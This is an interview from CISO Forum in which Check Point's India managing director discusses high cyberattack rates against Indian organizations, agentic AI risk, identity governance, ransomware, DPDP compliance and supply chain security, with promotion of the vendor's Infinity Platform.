India is now one of the most targeted nations in the cyber world, not by coincidence, but by design. With organizations absorbing nearly 3,300 attacks per week, significantly above the global average, the country’s rapid digital expansion has outpaced the security architectures meant to protect it. Sundar Balasubramanian, Managing Director for India and South Asia at Check Point Software Technologies, has watched this threat landscape intensify in real time. A seasoned voice on enterprise security strategy, Balasubramanian brings a perspective that is at once granular and urgent from the structural blind spots hiding inside fragmented cloud architectures to the boardroom conversations that still treat cyber risk as an IT line item rather than a business imperative. In this wide-ranging conversation with CISO Forum, he makes one thing unambiguously clear: the old playbooks no longer work, and the clock is ticking.
Managing Director for India and South Asia
Check Point Software Technologies
CISO Forum: AI Threat Intelligence: With India at 3,195 weekly attacks and AI accelerating adversarial speed, where are Indian enterprises most structurally unprepared and where are the most dangerous blind spots?
Sundar Balasubramanian: India’s cyber threat environment is now operating at significantly higher intensity than global averages, with organizations facing nearly 3,300 cyberattacks per week compared to the global average of 2,064 attacks per organization, according to a recent Check Point Threat Intelligence Report. This reflects not just higher attack frequency, but the rapid expansion of enterprise attack surfaces across cloud, SaaS, APIs, AI workloads, hybrid infrastructure, and third-party ecosystems.
What is increasingly evident is that attackers are no longer focused only on perimeter exploitation. They are targeting visibility gaps created by fragmented security architectures. Many organizations still operate with siloed controls across cloud, endpoint, identity, and network environments, making real-time threat correlation difficult and slowing the effectiveness of prevention.
The biggest structural blind spots today include unmanaged machine identities, shadow AI deployments, insecure APIs, lateral movement across hybrid environments, and weak governance around third-party access. Machine identities are scaling exponentially faster than human identities, yet most enterprises still lack centralized lifecycle management and behavioral monitoring around them.
AI is also fundamentally compressing attacker timelines. Check Point’s latest findings show that 90% of global organizations encountered risky AI prompts, 40% of MCP servers were vulnerable, and high-risk prompts increased by 97% year-on-year in 2025. This means enterprises are now facing AI-enabled reconnaissance, AI-generated phishing, automated malware adaptation, and AI-assisted impersonation campaigns at scale.
India’s exposure levels remain particularly elevated across multiple malware categories, including infostealer attacks at 7.5% versus 4.6% globally, banking malware at 4.3% versus 1.7%, botnet activity at 17.3% versus 9.9%, and ransomware impact at 7% compared to 3.6% globally. Additionally, 92% of malicious files delivered in India last month came through web-based channels, highlighting how browser-driven attack vectors are dominating modern threat delivery.
From a governance perspective, frameworks such as the DPDP Act and CERT-In mandates are also pushing enterprises to rethink cybersecurity beyond perimeter defense. Security now needs to operate as a continuous operational resilience layer embedded across infrastructure, identity, AI governance, and data flows.
CISO Forum: Agentic AI Risk: as agentic AI represents the next frontier of enterprise risk, how should CISOs think about its unique risk profile and what does a staged security architecture look like across maturity levels?
Sundar Balasubramanian: Agentic AI introduces a fundamentally different cyber risk model because these systems are designed not just to analyze information, but to autonomously make decisions, execute workflows, interact with APIs, and access enterprise systems with minimal human intervention. This shifts the security challenge from application protection toward runtime governance and execution-layer control.
The primary concern today is that enterprises are operationalizing AI agents faster than they are redesigning their governance architectures to support them. Check Point Research has already highlighted growing exposure to vulnerable MCP servers, risky prompts, and AI-assisted attack automation. Threat actors are increasingly using AI to accelerate phishing, malware customization, reconnaissance, and impersonation campaigns.
The risk profile around agentic AI includes prompt injection, privilege escalation, plugin compromise, data poisoning, runtime manipulation, excessive permissions, and AI-assisted lateral movement. What makes this especially challenging is that compromise can now occur through execution logic rather than only infrastructure exploitation.
CISOs, therefore, need to approach AI security in a phased maturity model. The first stage is governance and visibility — understanding where AI agents operate, what systems they access, and how sensitive data flows through them. The second stage is runtime protection through Zero Trust enforcement, API governance, segmentation, behavioral analytics, and continuous authentication. The final stage is autonomous resilience, in which organizations implement AI-driven policy orchestration, automated containment, and continuous runtime trust validation.
In India, this becomes even more important under DPDP obligations and emerging governance expectations across BFSI, telecom, healthcare, and critical infrastructure sectors. AI governance is increasingly linked to accountability, explainability, data localization, and operational compliance.
The long-term challenge is therefore not simply protecting AI systems, but governing autonomous decision-making inside enterprise environments. Organizations that continue treating AI security as an isolated application security problem will struggle to manage operational risk at scale.
CISO Forum: Prevention vs. Resilience: With 44% of Indian CISOs prioritizing cyber resilience over prevention, how do you reconcile these two imperatives — and where does the Infinity Platform fit a resilience-first strategy?
Sundar Balasubramanian: The debate between prevention and resilience is increasingly becoming obsolete because modern cyber environments no longer allow organizations to prioritize one at the expense of the other. Prevention without resilience assumes compromise is impossible, while resilience without prevention creates operational fatigue, escalating recovery costs, and prolonged disruption.
This balance has become especially critical in India’s high-intensity threat landscape. Check Point Research observed a 53% year-on-year increase in ransomware victim volumes globally, alongside nearly 50% growth in new ransomware groups, according to Check Point Research’s latest Ransomware Report. Attackers are also embedding AI into phishing, reconnaissance, malware customization, and extortion workflows.
India is already experiencing disproportionately high exposure, with ransomware impacting 7% of organizations compared to 3.6% globally. In comparison, botnet exposure in India stands at 17.3%, nearly double the global average according to Check Point Threat Intelligence Report. Modern attacks now move at machine speed, establish persistence early, and often exfiltrate sensitive data long before disruption becomes visible.
This is why recovery-centric models alone are no longer sustainable. Enterprises need architectures capable of reducing the probability of compromise, limiting lateral movement, and minimizing the operational blast radius before disruption occurs.
Platforms like Check Point Infinity are designed around this convergence between prevention and resilience. Check Point Infinity unifies cloud, endpoint, network, mobile, email, and identity protection into a single operational architecture powered by ThreatCloud AI, rather than operating as isolated security layers, prevention, detection, response, and policy orchestration functions continuously across environments.
The practical advantage is operational coherence, enabling organizations to reduce attack surface, accelerate detection, strengthen response coordination, and sustain business continuity simultaneously. In today’s environment, resilience should not be measured only by recovery speed, but by how effectively organizations can sustain operations under active attack conditions.
CISO Forum: Identity as the New Perimeter: Machine identities and third-party credentials sit at the lowest maturity tiers. What are the most common identity governance failures in Indian enterprises — and what is the realistic path to closing this gap?
Sundar Balasubramanian: Identity has effectively become the new enterprise perimeter as organizations continue expanding across hybrid work environments, SaaS ecosystems, cloud infrastructure, APIs, and third-party integrations. Attackers today are increasingly bypassing traditional perimeter controls and targeting credentials, service accounts, machine identities, API tokens, and vendor access pathways because these often operate with excessive trust and limited visibility.
Check Point’s India threat findings already reflect elevated identity-driven attacks. Banking malware impact in India stands at 4.3% compared to 1.7% globally, while infostealer attacks are at 7.5% versus 4.6% globally. These attacks are specifically designed to harvest credentials, escalate privileges, and establish persistent access inside enterprise environments.
The larger governance issue is that machine identities are now growing significantly faster than human identities, while security maturity around non-human identity governance remains low. Most organizations still lack centralized lifecycle management, behavioral monitoring, and policy enforcement for service accounts, APIs, workloads, and automated systems.
The most common failures we continue to see include excessive privileged access, inconsistent MFA enforcement, weak governance around vendor credentials, shared administrative access, poor API token hygiene, and limited visibility into machine identity behavior. In many environments, identity governance still operates independently of cloud, endpoint, and network security, resulting in fragmented enforcement models.
The realistic path forward is identity-centric Zero Trust architecture built around continuous authentication, adaptive trust, least-privilege access, and unified visibility across users, workloads, devices, APIs, and third-party systems. AI-driven behavioral analytics will also become increasingly important as machine-to-machine communication continues to scale rapidly.
From an India compliance standpoint, DPDP obligations and sectoral governance expectations across BFSI, telecom, healthcare, and critical infrastructure are further accelerating the need for stronger identity governance. Identity security is no longer a standalone IAM conversation; it now sits at the center of enterprise cyber resilience.
CISO Forum: Ransomware Kill Chain: With ransomware rated the most severe threat by 79% of respondents, how should Indian organizations redesign their architecture to disrupt the attack chain before encryption and exfiltration occur?
Sundar Balasubramanian: Ransomware has evolved far beyond isolated encryption attacks and now operates as a multi-stage business disruption model involving credential theft, reconnaissance, lateral movement, privilege escalation, exfiltration, and extortion. The challenge is that many organizations still intervene too late in the attack lifecycle, often only after encryption begins or operational disruption becomes visible.
Check Point Research observed a 53% year-on-year increase in ransomware victim volumes globally, alongside nearly 50% growth in new ransomware groups, according to the latest Ransomware Report. Smaller and more agile ransomware operators are increasingly embedding AI into phishing campaigns, malware customization, reconnaissance, and negotiation workflows.
India is already experiencing disproportionately high ransomware exposure, with 7% of organizations impacted compared to 3.6% globally, according to the Check Point Threat Intelligence Report. This reflects not only elevated attack activity but also structural visibility gaps across hybrid enterprise environments. Modern ransomware campaigns increasingly target cloud environments, unmanaged endpoints, APIs, and third-party ecosystems where monitoring remains fragmented.
The architectural shift organizations need today is moving from recovery-centric security models toward attack-chain interruption. The objective should be to stop attackers during the initial compromise, privilege escalation, and lateral movement phases before encryption and exfiltration occur.
Key priorities, therefore, include AI-powered phishing prevention, east-west traffic inspection, identity segmentation, least-privilege enforcement, continuous endpoint telemetry, behavioral analytics, immutable backup isolation, real-time threat intelligence correlation, and AI-assisted detection with automated containment.
A unified security architecture becomes critical in this environment because isolated controls cannot quickly correlate attack behavior in AI-driven attack scenarios. Prevention today is increasingly dependent on cross-domain visibility and coordinated policy enforcement rather than standalone point products.
CISO Forum: AI-Powered SOC and Talent Crisis: With talent shortage now the top internal barrier, what organizational prerequisites must be in place before SOC automation delivers — and what mistakes are organizations making in their automation journeys?
Sundar Balasubramanian: The cybersecurity talent shortage is becoming one of the biggest operational risks for enterprises because threat environments are expanding faster than security team capacity. Indian organizations are already facing nearly 3,300 attacks per week per organization, according to the Check Point Threat Intelligence Report, significantly above global averages, creating growing analyst fatigue, alert overload, and operational inefficiencies across SOC environments.
One of the biggest mistakes organizations continue to make is assuming automation alone will solve the talent problem. In reality, SOC automation only delivers value when foundational operational maturity already exists. Automating fragmented environments with inconsistent telemetry often accelerates noise rather than improving security outcomes.
Before deploying AI-powered SOC operations, enterprises need several foundational capabilities in place: unified telemetry visibility across cloud, endpoint, identity, network, and email environments; standardized response workflows; integrated policy orchestration; risk-based alert prioritization, high-quality threat intelligence; and cross-domain correlation capabilities.
Check Point’s research shows how AI is accelerating attack sophistication through AI-assisted phishing, malware adaptation, reconnaissance, and impersonation campaigns. This means SOC teams are now expected to defend against threats operating at machine speed, making operational simplification increasingly important.
The role of AI inside the SOC should therefore be augmentation rather than replacement. AI is most effective when it reduces repetitive workloads, accelerates correlation, improves prioritization, and allows analysts to focus on higher-order decision-making and incident response. Organizations achieving the strongest outcomes are those that combine AI automation with platform consolidation, operational simplification, and unified visibility.
In India, sectors such as BFSI, telecom, government, and critical infrastructure are also facing increased compliance expectations under the DPDP and CERT-In frameworks, making faster incident response, greater auditability, and enhanced operational visibility even more critical.
CISO Forum: DPDP Act: Architecture, Not Documentation — Most organizations still treat DPDP compliance as a reporting exercise. What specific architectural changes must CISOs implement to be operationally compliant — not just documentationally ready?
Sundar Balasubramanian: A significant number of enterprises still approach DPDP readiness primarily as a legal and reporting exercise, but operational compliance requires far deeper architectural transformation across data visibility, access governance, runtime monitoring, and breach response. Policies and documentation alone do not reduce operational exposure if sensitive data remains fragmented, overexposed, or poorly governed across hybrid environments.
Check Point’s India findings from the Check Point Threat Intelligence Report show that Information Disclosure has become the most common exploit category, impacting nearly 74% of organizations. This reinforces the idea that data exposure risk is increasingly operational rather than theoretical.
To become operationally compliant under DPDP, enterprises need to redesign their security architecture to enable continuous visibility, enforcement, and accountability. Key priorities include continuous data discovery and classification, identity-centric access governance, encryption and tokenization of sensitive data, API security enforcement, cloud workload visibility, runtime monitoring, real-time breach detection, and centralized auditability.
The challenge is compounded because Indian enterprises now operate across highly distributed environments that include SaaS applications, AI systems, cloud infrastructure, remote work models, and interconnected third-party ecosystems. Traditional perimeter-led governance is no longer sufficient in these environments.
Operational compliance will increasingly depend on whether organizations can demonstrate technical enforcement capability rather than only policy intent. Under DPDP and CERT-In mandates, enterprises will need to prove they can detect, contain, audit, and respond to incidents in near real time.
The organizations that will mature fastest are those that embed compliance directly into operational workflows through automation, unified telemetry, AI-driven monitoring, and continuous policy enforcement, rather than treating compliance as a periodic reporting exercise.
CISO Forum: Supply Chain Risk at Scale: Third-party risk monitoring beyond tier-one vendors is at the lowest maturity level. What does credible supply chain governance look like at a conglomerate scale — and what do boards systematically underestimate?
Sundar Balasubramanian: Supply chain attacks are becoming increasingly sophisticated because attackers are now exploiting trusted digital relationships rather than directly targeting enterprise perimeters. Modern enterprise ecosystems include SaaS providers, outsourced development teams, APIs, AI models, cloud platforms, open-source dependencies, and interconnected partner networks operating at enormous scale.
Check Point Research recently demonstrated an AI-assisted supply chain attack in which malicious code was introduced into an autonomous crypto-trading project via AI-generated contributions. This highlights how AI is now accelerating ecosystem-wide compromise pathways while lowering the barrier for attackers to infiltrate trusted software pipelines.
The biggest governance gap is that most enterprises still focus primarily on tier-one vendor assessment, while transitive exposure across fourth-party and fifth-party ecosystems remains largely unmonitored. Boards frequently underestimate how interconnected modern digital ecosystems have become and how quickly compromise can propagate across trusted environments.
The lowest maturity areas continue to include continuous third-party monitoring, vendor identity governance, software dependency visibility, API exposure management, runtime validation, privilege auditing, and behavioral monitoring across partner ecosystems.
Credible supply chain governance, therefore, requires moving from enterprise-centric security models toward ecosystem-centric governance. Organizations need continuous validation frameworks, software bill-of-materials visibility, Zero Trust enforcement, identity-centric controls, and AI-driven threat monitoring across interconnected vendor environments.
India’s push toward digital sovereignty, combined with DPDP obligations and sector-specific governance requirements, is also increasing pressure on organizations to strengthen oversight across outsourced operations, software dependencies, and data-sharing ecosystems. Supply chain security is no longer purely a procurement issue; it has become a core operational resilience challenge.
CISO Forum: Consolidation vs. Coverage Gaps: With deeply embedded point solutions and high sunk costs, how do you advise CISOs to build a pragmatic consolidation roadmap without creating new coverage gaps during transition?
Sundar Balasubramanian: Operational complexity has itself become a major multiplier of cyber risk. Indian organizations are already facing nearly 60% more attacks than the global average while simultaneously managing fragmented environments across cloud, endpoint, network, identity, SaaS, APIs, and AI layers.
Many enterprises now recognize the strategic need for consolidation, but one of the biggest mistakes organizations make is pursuing aggressive vendor reduction before establishing operational visibility and governance maturity. Abrupt platform rationalization can create dangerous blind spots if controls are removed faster than security capabilities evolve.
A pragmatic consolidation strategy should therefore begin with telemetry unification rather than immediate tool elimination. Organizations first need centralized visibility, policy orchestration, and cross-domain correlation before rationalizing overlapping technologies.
Key priorities should include telemetry unification across cloud, endpoint, identity, and network environments; centralized policy orchestration; cross-domain visibility; continuous validation testing; risk-prioritized migration; and platform-led operational simplification. Incremental consolidation is generally far more sustainable than large-scale replacement exercises.
The strategic objective is not only to reduce vendor count. It improves consistency in prevention, accelerates response times, reduces alert fatigue, and strengthens operational coherence across hybrid environments.
Platforms like Check Point Infinity are becoming increasingly relevant because they allow organizations to consolidate prevention, visibility, and operational management capabilities without sacrificing coverage during transition periods. A unified architecture becomes especially important in AI-driven threat environments, where fragmented tooling impedes correlation and delays responses.
From a business perspective, consolidation also needs to align with operational resilience, compliance readiness, and long-term governance strategy rather than purely procurement-driven cost optimization.
CISO Forum: The Board Conversation: With leadership misalignment the biggest barrier to stronger security outcomes, what is your practical playbook for shifting the board conversation from budget approval to genuine co-ownership of cyber risk?
Sundar Balasubramanian: Cybersecurity conversations at the board level are increasingly shifting from technical oversight to enterprise resilience, operational continuity, and governance accountability. This shift is necessary because Indian organizations operate in one of the world’s highest-threat-density environments.
According to Check Point Threat Intelligence Report’s recent data, sectors such as education, government, telecom, and infrastructure are experiencing some of the highest attack volumes in India, with the education sector alone facing more than 7,100 attacks per organization per week. This demonstrates that cyber risk is no longer confined to IT environments; it now directly impacts operational continuity, customer trust, regulatory exposure, and business resilience.
One of the biggest barriers to stronger cybersecurity outcomes remains leadership misalignment. Many organizations still approach cybersecurity as an annual budget discussion rather than an enterprise-wide governance issue. As a result, accountability often remains isolated within security teams rather than being embedded in strategic business decision-making.
The most effective CISOs are reframing cyber conversations around financial exposure, operational disruption, AI governance, supply chain resilience, regulatory accountability, reputational impact, and customer trust. Boards respond far more effectively when cybersecurity is connected to measurable business outcomes rather than isolated technical metrics.
The practical playbook for stronger board engagement is translating cyber posture into business-impact language. Discussions around ransomware, AI risk, third-party exposure, and operational resilience need to be positioned in terms of revenue impact, downtime, ecosystem disruption, regulatory penalties, and strategic continuity.
Cybersecurity governance increasingly needs to resemble financial governance — embedded in transformation initiatives, cloud strategy, AI adoption, M&A decisions, and supply chain oversight. The organizations making the strongest progress today are those where cyber accountability extends beyond the CISO and becomes a shared leadership responsibility across business, operations, compliance, and technology teams.
